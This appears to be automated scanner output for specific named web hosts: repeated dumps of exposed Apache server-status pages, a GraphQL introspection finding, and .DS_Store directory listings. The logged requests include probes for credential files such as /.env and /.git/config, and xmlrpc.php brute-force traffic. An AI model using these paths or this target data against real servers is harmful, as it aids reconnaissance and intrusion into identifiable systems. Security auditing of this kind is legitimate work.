66.249.69.184http/1.1tandemsl.com:443GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1 4-2314921340/16/28988R 15.1915879612207390.00.521441.50 107.167.39.74http/1.1tandemsl.com:443GET / H
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858023eb63b3b
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Friday, 30-Sep-2022 17:57:52 CEST Restart Time: Thursday, 25-Aug-2022 11:36:20 CEST Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 36 days 6 hours 21 minutes 32 seconds Server load: 0.30 0.20 0.19 Total accesses: 980137 - Total Traffic: 49.9 GB - Total Duration: 38820347 CPU Usage: u353.5 s423.76 cu2427.16 cs2672.97 - .188% CPU load .313 requests/sec - 16.7 kB/second - 53.4 kB/request - 39.6071 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01143489no0yes19000 11143491no0yes010000 21143490no0yes19000 31216686no0yes010000 41210704no0yes010000 Sum500 248000 __R____________________W__________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1911434890/1956/13712_ 169.39004400220.046.66557.13 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/3130332e32332e36312e3830/_/;/META-INF/maven/com.atlassia 0-1911434890/1918/13678_ 169.396974429430.045.32502.23 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 0-1911434890/1887/13673R 169.3512963938560.050.99524.51 20.12.184.34http/1.1tandemsl.com:443 0-1911434890/1913/13557_ 169.260984487810.045.95485.22 206.189.185.209http/1.1 0-1911434890/1959/13786_ 169.37101043998850.062.13544.42 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 0-1911434890/1906/13639_ 169.35101103802060.053.53505.82 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 0-1911434890/1950/13682_ 169.39101224006270.054.33454.43 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 0-1911434890/1913/13761_ 169.39003777470.042.89531.22 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-1911434890/1918/13707_ 169.3761094294870.051.75528.64 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 0-1911434890/1937/13679_ 169.366984131820.046.54491.30 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 1-1911434910/1614/19874_ 176.9451178196630.038.80955.20 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 1-1911434910/1627/19771_ 176.96008253930.045.991066.50 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-1911434910/1625/19886_ 176.89111177820910.041.121056.47 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 1-1911434910/1641/19832_ 176.9521027765640.046.301141.52 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 1-1911434910/1638/19928_ 176.92111107801700.044.901099.52 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 1-1911434910/1610/19813_ 176.95008266930.044.941007.60 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-1911434910/1600/19878_ 176.9121008502880.048.661103.17 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 1-1911434910/1607/19845_ 176.95007856980.040.761239.01 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 1-1911434910/1626/19843_ 176.9251267836630.047.041109.62 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 1-1911434910/1607/19777_ 176.8351038224010.041.701069.58 178.128.250.30http/1.1 2-1911434900/1670/19251_ 162.38211168283530.043.841136.27 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 2-1911434900/1636/19138_ 162.320988387440.044.001112.10 206.189.185.209http/1.1 2-1911434900/1651/19215_ 162.4211198318210.057.151132.05 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 2-1911434900/1658/19108W 162.35007686020.047.141241.83 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-1911434900/1633/19177_ 162.3911017636400.049.071065.83 206.189.185.209http/1.1 2-1911434900/1641/19136_ 162.43007761000.041.171200.73 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-1911434900/1654/19309_ 162.43007627920.050.751220.60 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-1911434900/1647/19264_ 162.341988101440.047.671116.73 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 2-1911434900/1642/19166_ 162.3711087858420.047.061145.96 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 2-1911434900/1620/19212_ 162.43007839030.051.621090.38 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 3-1912166860/868/19748_ 35.14007674260.023.86911.56 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 3-1912166860/893/19622_ 35.14207914830.039.09928.54 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 3-1912166860/859/19726_ 35.14008660330.031.85997.26 206.189.185.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 3-1912166860/863/19714_ 35.1411287778750.029.72899.10 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 3-1912166860/885/19835_ 35.0911027504860.044.61912.57 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 3-1912166860/880/19736_ 35.1311017668040.050.40972.58 206.189.185.209http/1.1 3-1912166860/879/19633_ 35.132997882890.029.05923.65 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 3-1912166860/874/19724_ 35.1231047366160.046.88924.69 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 3-1912166860/854/19624_ 35.0931527617790.032.99948.29 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 3-1912166860/870/19867_ 35.0911077835480.055.081069.08 206.189.185.209http/1.1 4-1912107040/873/25416_ 46.94310910877700.027.681383.12 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 4-1912107040/895/25550_ 46.96010911055020.025.201428.45 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 4-1912107040/899/25579_ 46.92210810976810.018.131414.29 206.189.185.209http/1.1 4-1912107040/923/25715_ 46.94110010672500.019.741411.44 206.189.185.209http/1.1 4-1912107040/908/25473_ 46.93111511374160.019.351358.81 206.189.185.209http/1.1 4-1912107040/925/25546_ 46.95012910706110.020.211479.83 206.189.185.209http/1.1 4-1912107040/889/25581_ 46.94011010914830.013.871370.15 206.189.185.209http/1.1 4-1912107040/884/25568_ 46.93311110676840.029.061463.96 20.12.184.34http/1.1tandemsl.com:443POST //xmlrpc.php HTTP/1.1 4-1912107040/900/25685
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802a5a53a18
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Saturday, 17-Sep-2022 06:26:44 CEST Restart Time: Thursday, 25-Aug-2022 11:36:20 CEST Parent Server Config. Generation: 18 Parent Server MPM Generation: 17 Server uptime: 22 days 18 hours 50 minutes 23 seconds Server load: 0.00 0.02 0.00 Total accesses: 714936 - Total Traffic: 41.0 GB - Total Duration: 29794238 CPU Usage: u135.62 s173.64 cu1643.24 cs1757.9 - .188% CPU load .363 requests/sec - 21.9 kB/second - 60.2 kB/request - 41.674 ms/request 6 requests currently being processed, 44 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01014766no0yes010000 11014769no0yes010000 21014768no0yes19000 31014898no0yes19000 41014767no0yes46000 Sum500 644000 ________________________R__________W_______RW_R_R_ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1710147660/621/9895_ 33.41116503167220.016.08461.32 13.37.231.23http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/bootstrap-wysihtml5.css HT 0-1710147660/616/9882_ 35.8315513459310.014.91403.03 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1663386589.62411499023437500000 0-1710147660/620/9910_ 33.666341173099350.021.89429.64 87.101.92.171http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 0-1710147660/616/9790_ 36.10013584070.020.78385.81 188.166.147.46http/1.1 0-1710147660/619/9945_ 36.361551743004980.013.93428.59 35.219.66.183http/1.1tandemsl.com:443GET /wp-login.php HTTP/1.1 0-1710147660/634/9857_ 34.62155302865930.014.33386.18 20.163.79.86http/1.1relehse.com:443GET / HTTP/1.1 0-1710147660/599/9849_ 36.2463403086640.016.99341.50 147.78.47.249http/1.1tandemsl.com:443GET /wp-includes/wlwmanifest.xml HTTP/1.1 0-1710147660/614/9926_ 35.2511654122944920.015.38431.18 114.119.153.237http/1.1tandemsl.com:443GET /requisitos-legales-ambientales/ HTTP/1.1 0-1710147660/619/9889_ 34.63155173345520.018.77422.74 94.232.43.93http/1.1tandemsl.com:443GET /wp-config-sample.php HTTP/1.1 0-1710147660/609/9867_ 36.3615513081480.015.96385.75 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1663388648.16318202018737792968 1-1710147690/944/16051_ 43.843761746998980.030.31839.35 40.77.167.50http/1.1 1-1710147690/916/15929_ 44.15007245250.021.80947.42 188.166.147.46http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-1710147690/916/16062_ 44.14016796090.021.37946.43 188.166.147.46http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 1-1710147690/930/16005_ 43.95006638840.031.131029.19 188.166.147.46http/1.1 1-1710147690/934/16095_ 44.030266737920.035.84989.68 188.166.147.46http/1.1 1-1710147690/922/16031_ 43.7401996913750.021.64905.73 188.166.147.46http/1.1 1-1710147690/927/16072_ 43.20007437450.029.18998.88 188.166.147.46http/1.1 1-1710147690/925/16034_ 43.9801256974440.027.641132.30 188.166.147.46http/1.1 1-1710147690/920/16030_ 43.800186879830.025.07981.61 188.166.147.46http/1.1 1-1710147690/914/15954_ 43.15007014220.029.42973.35 51.178.207.154http/1.1 2-1710147680/602/15742_ 32.20439907678300.015.331033.43 13.37.231.23http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/jquery-ui.css HTTP/1.1 2-1710147680/598/15680_ 32.20426307854420.014.041015.65 13.37.231.23http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/duallistbox.css HTTP/1.1 2-1710147680/608/15740_ 35.016383177811620.016.831031.13 147.78.47.249http/1.1tandemsl.com:443GET /_ignition/health-check/ HTTP/1.1 2-1710147680/605/15621_ 32.20007112450.017.711131.29 188.166.147.46http/1.1 2-1710147680/599/15713R 34.06439916997270.018.06964.15 188.166.147.46http/1.1 2-1710147680/591/15661_ 34.10426307290560.014.081103.72 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1663384540.84780192375183105468 2-1710147680/598/15805_ 32.2063807002300.020.271115.95 13.39.21.33http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/bootstrap-wysihtml5.css HT 2-1710147680/594/15774_ 32.20426307634150.017.441021.27 13.37.231.23http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/pickadate.css HTTP/1.1 2-1710147680/604/15688_ 35.016311977228480.017.751053.79 147.78.47.249http/1.1tandemsl.com:443GET /wp-content/plugins/wp-file-manager/lib/php/connector.minim 2-1710147680/610/15746_ 34.056311917241540.019.67983.34 182.162.90.116http/1.1tandemsl.com:443GET /wp-includes/upload_index.php?auth=a HTTP/1.1 3-1710148980/1161/11994_ 43.69004430450.028.87568.45 188.166.147.46http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-1710148980/1189/11854_ 43.50004669920.038.69604.74 188.166.147.46http/1.1 3-1710148980/1167/11928_ 43.69005036420.031.23630.23 188.166.147.46http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-1710148980/1206/12004_ 43.68904536400.045.61575.02 185.196.220.81http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /boaform/admin/formLogin HTTP/1.1 3-1710148980/1186/12037_ 43.491541834546100.050.23647.69 66.249.66.22http/1.1 3-1710148980/1181/11906W 43.52004510410.044.46618.36 188.166.147.46http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-1710148980/1163/11933_ 43.69004797360.056.09585.40 188.166.147.46http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 3-1710148980/1178/11947_ 43.69004185530.032.92583.83 188.166.147.46http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 3-1710148980/1151/11964_ 43.3491804707810.036.06637.61 185.196.220.81http/1.1 3-1710148980/1194/12071_ 43.5501544408730.042.76697.95 188.166.147.46http/1.1 4-1710147670/568/17827_ 34.01172907681210.017.711150.76 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1663387074.45256209373474121093 4-1710147670/558/17910_ 31.49172907789990.015.301159.76 13.37.231.23http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/jquery-ui.css HTTP/1.1 4-1710147670/562/17892_ 31.4916029007795310.015.011146.54 34.250.24.75http/1.1tandemsl.com:443GET / HTTP/1.1 4-1710147670/567/18030R 32.25861707435070.016.261137.56 101.33.247.52http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET http://103.23.61.80:80/phpMyAdmin/scripts/setup.php HTTP/1. 4-1710147670/573/17827W 31.47007937040.020.601130.19 188.166.147.46http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-1710147670/568/17804_ 33.93206817548530.020.881218.16 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1663386735.72352695465087890625 4-1710147670/572/17926R 31.861017207654710.021.361123.90 34.250.24.75http/1.1tandemsl.com:443GET / HTTP/1.1 4-1710147670/565/17926_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802fadaa44e
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Tuesday, 13-Sep-2022 10:31:06 CEST Restart Time: Thursday, 25-Aug-2022 11:36:20 CEST Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 18 days 22 hours 54 minutes 46 seconds Server load: 0.04 0.03 0.00 Total accesses: 622640 - Total Traffic: 37.0 GB - Total Duration: 26934632 CPU Usage: u119.17 s155.98 cu1363.8 cs1442.34 - .188% CPU load .38 requests/sec - 23.7 kB/second - 62.3 kB/request - 43.2588 ms/request 3 requests currently being processed, 47 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0950601no0yes010000 1950605no3yes19002 2950604no1yes010000 3950734no2yes28001 4950603no0yes010000 Sum506 347003 __________________W___________RW__________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-119506010/227/8478_ 32.0348202926360.011.40413.18 2.136.78.3http/1.1relehse.com:443POST /admin/requirements/details HTTP/1.1 0-119506010/223/8464_ 32.110273126450.010.12335.12 46.101.189.134http/1.1 0-119506010/200/8502_ 32.150272815500.04.16360.78 46.101.189.134http/1.1 0-119506010/219/8394_ 32.1649173284840.011.60336.71 77.228.59.218http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 0-119506010/207/8543_ 32.1104832798460.05.59383.98 46.101.189.134http/1.1 0-119506010/209/8438_ 31.872002585790.05.52345.77 2.136.78.3http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/bootstrap-colorpicker.css 0-119506010/204/8454_ 32.110252551880.04.72294.90 46.101.189.134http/1.1 0-119506010/217/8509_ 32.1346252594500.05.92370.57 2.136.78.3http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 0-119506010/220/8490_ 32.1651372927690.07.98371.03 2.136.78.3http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 0-119506010/218/8476_ 32.0947242854970.06.12343.31 2.136.78.3http/1.1relehse.com:443GET /admin/locations/regions/69 HTTP/1.1 1-119506050/556/13674_ 38.210295953970.025.54761.58 46.101.189.134http/1.1 1-119506050/547/13582_ 38.230176486990.018.30874.70 46.101.189.134http/1.1 1-119506050/560/13677_ 38.26006008830.020.18861.32 46.101.189.134http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-119506050/540/13637_ 38.2116235722920.017.42924.40 2.136.78.3http/1.1relehse.com:443POST /admin/masters/edit-requirement HTTP/1.1 1-119506050/555/13676_ 38.26005908980.023.38895.65 46.101.189.134http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 1-119506050/544/13678_ 38.26006210170.016.85820.88 46.101.189.134http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/3130332e32332e36312e3830/_/;/META-INF/maven/com.atlassia 1-119506050/540/13684_ 38.230266491370.019.60902.03 46.101.189.134http/1.1 1-119506050/569/13672_ 38.240205993310.020.411054.61 46.101.189.134http/1.1 1-119506050/526/13660W 38.06005968170.030.26897.29 46.101.189.134http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-119506050/560/13604_ 38.251206153960.020.19896.65 83.48.84.113http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 2-119506040/239/14469_ 35.240357466050.05.16997.66 2.136.78.3http/1.1relehse.com:443GET /admin/requirements/975/showNotices?draw=1&columns%5B0%5D%5 2-119506040/228/14429_ 35.1115387584050.05.48976.49 2.136.78.3http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 2-119506040/216/14505_ 35.04007522210.07.85994.95 46.101.189.134http/1.1 2-119506040/239/14386_ 35.2918206739480.012.421088.25 213.192.214.80http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 2-119506040/230/14444_ 35.30116701040.05.71920.44 46.101.189.134http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 2-119506040/229/14443_ 35.1414717107120.06.761068.25 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1663057468.51304292678833007812 2-119506040/236/14545_ 35.2415356764800.05.531061.36 2.136.78.3http/1.1relehse.com:443POST /admin/requirements/notices-show HTTP/1.1 2-119506040/232/14534_ 35.05103207117050.010.40980.23 139.228.80.82http/1.1 2-119506040/231/14446_ 35.31007043880.06.801018.48 46.101.189.134http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 2-119506040/229/14474_ 35.031506998850.010.41939.46 87.249.43.129http/1.1 3-119507340/645/9055R 40.346233396230.032.69396.48 46.101.189.134http/1.1 3-119507340/620/8934_ 40.39003369540.032.53439.53 46.101.189.134http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-119507340/630/8977_ 40.290223905400.047.06459.40 46.101.189.134http/1.1 3-119507340/625/9028_ 40.376493429420.026.13388.52 2.136.78.3http/1.1relehse.com:443POST /admin/requirements/975 HTTP/1.1 3-119507340/646/9056_ 40.383223558310.046.33461.61 2.136.78.3http/1.1relehse.com:443POST /admin/requirements/details HTTP/1.1 3-119507340/622/8972_ 40.3864083612470.035.67417.23 2.136.78.3http/1.1relehse.com:443GET /admin/masters/tree?data=%5B%221%22%2C%223%22%2C%2224%22%2C 3-119507340/649/9017_ 40.39003713490.042.75380.14 46.101.189.134http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-119507340/644/9014_ 40.386232947530.031.92372.69 2.136.78.3http/1.1relehse.com:443POST /admin/requirements/orders HTTP/1.1 3-119507340/617/9020_ 40.353263544190.031.19440.38 2.136.78.3http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 3-119507340/636/9066_ 40.270193326980.063.51509.19 2.136.78.3http/1.1relehse.com:443POST /admin/requirements/details HTTP/1.1 4-119506030/269/16582_ 33.06109177371960.05.961107.07 77.228.59.218http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-119506030/277/16676_ 33.10007646200.012.691126.86 46.101.189.134http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 4-119506030/257/16633_ 32.98155177480860.010.401104.24 77.228.59.218http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-119506030/275/16770_ 33.10007072790.09.971089.82 46.101.189.134http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 4-119506030/257/16573_ 33.0762227588340.014.821081.29 83.48.84.113http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-119506030/264/16559_ 32.9359227333410.017.981166.16 83.48.84.113http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-119506030/264/16665_ 33.0280257372340.010.241074.83 2.136.78.3http/1.1relehse.com:443GET /admin/locations/states/69 HTTP/1.1 4-119506030/267/16664_ 32.95157587643360.06.271144.21 2.136.78.3http/1.1relehse.com:443POST /admin/requirements/noti
GraphQL introspection is enabled.
This could leak to data leak if not properly configured.
Severity: medium
Fingerprint: c2db3a1c40d490db1a0bbaa3d9181c39a346585bfbe2b3f59676f8159676f815
GraphQL introspection enabled at /graphql Types: 12 (by kind: ENUM: 2, OBJECT: 7, SCALAR: 3) Operations: - Query: Query | fields: _empty Directives: deprecated, include, skip (total: 3)
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c026392ab026392ab54ab8bc43f3f82f0f83c41627eb5a89e
Found 7 files trough .DS_Store spidering: /admin_layout /admin_layout/plugins /admin_layout/plugins/fullcalendar /help /images /images/companies /templates
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725e4bea3ba6c6a3fb1912bbf66a1c6c5e9
Found 9 files trough .DS_Store spidering: /admin_layout /admin_layout/assets /admin_layout/assets/img /admin_layout/assets/img/modules /build /help /images /js /templates
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814e9cf9aad3a4acf70eedb88124392b6099
Found 6 files trough .DS_Store spidering: /admin_layout /build /help /images /js /templates
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09cccdd54a0ccdd54a0832d97c130d1cfc2fec61651e49b5c54
Found 13 files trough .DS_Store spidering: /admin_layout /admin_layout/assets /admin_layout/assets/img /admin_layout/assets/img/icons /admin_layout/assets/img/modules /admin_layout/plugins /admin_layout/plugins/fullcalendar /build /help /images /images/companies /noticias /templates
Severity: low
Fingerprint: 5f32cf5d6962f09c026392ab026392ab54ab8bc43f3f82f0f83c41627eb5a89e
Found 7 files trough .DS_Store spidering: /admin_layout /admin_layout/plugins /admin_layout/plugins/fullcalendar /help /images /images/companies /templates
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814e9cf9aad3968429f5c7cf157ba1c83b98
Found 6 files trough .DS_Store spidering: /admin_layout /admin_layout/plugins /admin_layout/plugins/fullcalendar /help /images /templates
Severity: low
Fingerprint: 5f32cf5d6962f09c4239b3d84239b3d815c13809e2a55b1aa4cb082956f733a0
Found 8 files trough .DS_Store spidering: /admin_layout /admin_layout/assets /admin_layout/assets/img /admin_layout/assets/img/modules /build /images /js /templates
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9db7f4c636b7f4c636b7f4c636b7f4c636
Found 1 files trough .DS_Store spidering: /images
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf176420a6efc47aed095a0aed095a0aed095a0
Found 2 files trough .DS_Store spidering: /admin_layout /images
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c026392ab026392ab54ab8bc43f3f82f0f83c41627eb5a89e
Found 7 files trough .DS_Store spidering: /admin_layout /admin_layout/plugins /admin_layout/plugins/fullcalendar /help /images /images/companies /templates
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725e4bea3ba6c6a3fb1912bbf66a1c6c5e9
Found 9 files trough .DS_Store spidering: /admin_layout /admin_layout/assets /admin_layout/assets/img /admin_layout/assets/img/modules /build /help /images /js /templates
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c4239b3d84239b3d815c13809e2a55b1aa4cb082956f733a0
Found 8 files trough .DS_Store spidering: /admin_layout /admin_layout/assets /admin_layout/assets/img /admin_layout/assets/img/modules /build /images /js /templates
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9db7f4c636b7f4c636b7f4c636b7f4c636
Found 1 files trough .DS_Store spidering: /images
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf176420a6efc47aed095a0aed095a0aed095a0
Found 2 files trough .DS_Store spidering: /admin_layout /images
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31a4335f83a4335f83307f656a
Apache Status Apache Server Status for www.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Saturday, 12-Nov-2022 20:31:45 CET Restart Time: Friday, 11-Nov-2022 03:17:59 CET Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 1 day 17 hours 13 minutes 46 seconds Server load: 0.00 0.00 0.00 Total accesses: 24328 - Total Traffic: 670.0 MB - Total Duration: 961327 CPU Usage: u3.99 s5.76 cu111.8 cs134.97 - .173% CPU load .164 requests/sec - 4733 B/second - 28.2 kB/request - 39.5153 ms/request 7 requests currently being processed, 43 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01994697no0yes19000 11994562no0yes010000 21994563no0yes64000 31994564no0yes010000 41994565no0yes010000 Sum500 743000 ______W_____________RRW____RRR____________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1919946970/1/379_ 0.010089990.00.007.42 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 0-1919946970/1/381_ 0.010092100.00.007.14 164.92.224.29http/1.1 0-1919946970/2/389_ 0.0100106700.00.0110.06 